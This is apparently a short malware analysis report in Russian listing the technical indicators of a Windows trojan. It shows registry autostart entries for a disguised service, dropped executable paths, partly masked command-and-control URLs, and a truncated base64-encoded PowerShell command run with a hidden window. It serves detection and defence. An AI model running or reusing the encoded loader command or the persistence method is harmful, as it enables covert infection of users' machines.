Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\xpsrchvw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\xpsrchvw] 'ImagePath' = '"%WINDIR%\SysWOW64\pcaui\xpsrchvw.exe"'
- 'xpsrchvw' "%WINDIR%\SysWOW64\pcaui\xpsrchvw.exe"
- 'xpsrchvw' %WINDIR%\SysWOW64\pcaui\xpsrchvw.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADgANAB2AHUAZQBkAD0AWwBjAGgAYQByAF0ANAAyADsAJABFADgAMgAxADQAYgB2AD0AKAAoACcATgBnAG8AJwArACcAMwAnACkAKwAnAG4AJwArACcAbAB2ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQ...
- %HOMEPATH%\s4g7v35\y4ya89d\a9d1zi.exe
- %WINDIR%\syswow64\pcaui\xpsrchvw.exe
- %HOMEPATH%\s4g7v35\y4ya89d\a9d1zi.exe в %WINDIR%\syswow64\pcaui\xpsrchvw.exe
- '47.##.140.164':80
- http://ya###abdal.com/textnow-recover/HGRRD/
- http://47.##.140.164/56OZz/eQxCP7/nGG21NP337d6mgOo/Ur2zJwNHj/
- DNS ASK ya###abdal.com
- '%HOMEPATH%\s4g7v35\y4ya89d\a9d1zi.exe'
- '%WINDIR%\syswow64\pcaui\xpsrchvw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABaADgANAB2AHUAZQBkAD0AWwBjAGgAYQByAF0ANAAyADsAJABFADgAMgAxADQAYgB2AD0AKAAoACcATgBnAG8AJwArACcAMwAnACkAKwAnAG4AJwArACcAbAB2ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQ...' (со скрытым окном)